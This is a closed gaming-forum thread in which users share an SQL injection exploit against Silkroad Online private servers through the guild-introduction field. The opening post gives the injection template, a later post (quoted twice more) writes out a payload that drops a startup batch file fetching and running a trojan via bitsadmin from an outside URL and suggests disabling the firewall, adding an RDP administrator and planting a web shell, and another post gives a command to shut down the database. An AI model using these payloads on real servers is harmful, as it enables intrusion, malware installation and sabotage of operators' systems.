Register for your free account! | Forgot your password?

You last visited: Today at 00:02

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



[EXPLOIT] SQL Inject Inside SRO

Discussion on [EXPLOIT] SQL Inject Inside SRO within the SRO PServer Guides & Releases forum part of the SRO Private Server category.

Closed Thread
 
Old   #1
 
xxnukertube's Avatar
 
elite*gold: 0
Join Date: May 2010
Posts: 578
Received Thanks: 166
Cool [EXPLOIT] SQL Inject Inside SRO

Sql Injection Inside Game :V
Editing "About Guild"

-- Requirements: Own Fortress and be master.

work like this:

a'; write query here ; Update _SiegeFortress SET Introduction = 'Introduction Here

Then Click in Confirm

Example


Enjoy :V
Attached Images
File Type: jpg Sql Inject VSRO.jpg (34.2 KB, 621 views)
xxnukertube is offline  
Thanks
4 Users
Old 09/19/2016, 08:53   #2
 
elite*gold: 10
Join Date: May 2013
Posts: 1,984
Received Thanks: 1,148
no offense but just useless
Jimmy* is offline  
Old 09/19/2016, 09:03   #3
 
elite*gold: 32
Join Date: Dec 2015
Posts: 2,275
Received Thanks: 1,113
Quote:
Originally Posted by Jimmy* View Post
no offense but just useless
Useless?

a'; SELECT 'bitsadmin.exe /transfer "bla" "http://download.url/bigtrojaner.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\trojan.exe"' into outfile 'C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\autostart.bat';

- Now wait until they restart the Server and u got full Access of the Server.
- If they use GameServer and Webserver with same Server u can upload easy a shell and got access faster.
- You can create a bat file who deactivate the Firewall, adds a new Administrator with RemoteDesktop rights and after restart u can access throug RDP.
- You can change the whole Database, create new Admin Account ingame, change ur level, your power etc.
Yeh its useless.
FlyffServices is offline  
Thanks
3 Users
Old 09/19/2016, 09:56   #4
 
FoxRayz's Avatar
 
elite*gold: 0
Join Date: Apr 2009
Posts: 1,713
Received Thanks: 892
Quote:
Originally Posted by FlyffServices View Post
Useless?

a'; SELECT 'bitsadmin.exe /transfer "bla" "http://download.url/bigtrojaner.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\trojan.exe"' into outfile 'C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\autostart.bat';

- Now wait until they restart the Server and u got full Access of the Server.
- If they use GameServer and Webserver with same Server u can upload easy a shell and got access faster.
- You can create a bat file who deactivate the Firewall, adds a new Administrator with RemoteDesktop rights and after restart u can access throug RDP.
- You can change the whole Database, create new Admin Account ingame, change ur level, your power etc.
Yeh its useless.
Agreed, there's a lot of opportunities to do. Even though the OS server has some built in security features compared to the client version you can still do a lot.
FoxRayz is offline  
Old 09/19/2016, 10:04   #5
 
rares495's Avatar
 
elite*gold: 0
Join Date: Jan 2009
Posts: 462
Received Thanks: 219
Quote:
Originally Posted by FlyffServices View Post
Useless?

a'; SELECT 'bitsadmin.exe /transfer "bla" "http://download.url/bigtrojaner.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\trojan.exe"' into outfile 'C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\autostart.bat';

- Now wait until they restart the Server and u got full Access of the Server.
- If they use GameServer and Webserver with same Server u can upload easy a shell and got access faster.
- You can create a bat file who deactivate the Firewall, adds a new Administrator with RemoteDesktop rights and after restart u can access throug RDP.
- You can change the whole Database, create new Admin Account ingame, change ur level, your power etc.
Yeh its useless.
I think he meant that the thread is useless since there already is one open about this exploit.

Obviously the exploit isn't useless at all.
rares495 is offline  
Thanks
1 User
Old 09/19/2016, 12:10   #6
 
russak8642's Avatar
 
elite*gold: 0
Join Date: Dec 2009
Posts: 452
Received Thanks: 73
dammm it was to keep in secret!
russak8642 is offline  
Old 09/19/2016, 12:14   #7
 
sa.vi's Avatar
 
elite*gold: 0
Join Date: Mar 2016
Posts: 68
Received Thanks: 37
use it to disable the sql

test' shutdown--
sa.vi is offline  
Thanks
1 User
Old 09/19/2016, 12:46   #8
 
KralBoi's Avatar
 
elite*gold: 0
Join Date: Jan 2016
Posts: 105
Received Thanks: 46
why are you creating a thread while this was already discussed 2 weeks ago?

#attentionsnitch much?
KralBoi is offline  
Thanks
4 Users
Old 09/19/2016, 13:03   #9
 
elite*gold: 0
Join Date: Jan 2012
Posts: 53
Received Thanks: 0
Quote:
Originally Posted by KralBoi View Post
why are you creating a thread while this was already discussed 2 weeks ago?

#attentionsnitch much?
Can you anti this ?
itatknic is offline  
Old 09/19/2016, 14:10   #10


 
Spidy.'s Avatar
 
elite*gold: 1
Join Date: Oct 2012
Posts: 8,423
Received Thanks: 3,239
#Closed

Spidy. is offline  
Thanks
1 User
Closed Thread


Similar Threads Similar Threads
[Selling] ✔Protection Anti DDOS, Inject and Exploit 4 VSRO
07/03/2020 - Silkroad Online Trading - 6 Replies
Anti DDOS Attak >> 30 e*g Anti Inject for SQL & Website >> 50 e*g Anti Exploit Files (LATEST VER) >> 100 e*g ✔If you want buy add me on skype : albert.dev #PUSH
Open Source Injector - Auto/Manual Inject, Verify Inject, Saves Settings
01/28/2013 - Combat Arms Hacks, Bots, Cheats & Exploits - 5 Replies
Open Source Injector - Auto/Manual Inject, Verify Inject, Saves Settings Features: -Auto Inject -Customizable Delay -Manual Inject -Verify Inject
Check inside - an exploit that will fuck up every single of you
09/10/2012 - Silkroad Online Trading - 82 Replies
Hello everyone, as you might have heard or not, there are few exploits(not just the dupe bug) that work everywhere, regardless of what kind of server files you use. We offer you a bugfix, however, you will not be told how it works(the bug itself), it's just a fix - nothing more. Basically, we can dupe any item we want, stackable or not, plus, we are also able to crash your server easily, not to mention the old-school "exchange bug" that allows you to "trade a sun" but the person will receive...
[Exploit]Inside the auction House/Bank
06/11/2011 - WoW Exploits, Hacks, Tools & Macros - 4 Replies
hey leute mal was neus von mir Ich zeige euch heute wie ihr hinter das gitter von der bank kommt und Hinter den npc´s in ah kommt Have fun Join Us :) So Kommt man auch Unter ganz azeroth ;) Inside the auction House Inside the Bank



All times are GMT +2. The time now is 00:02.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.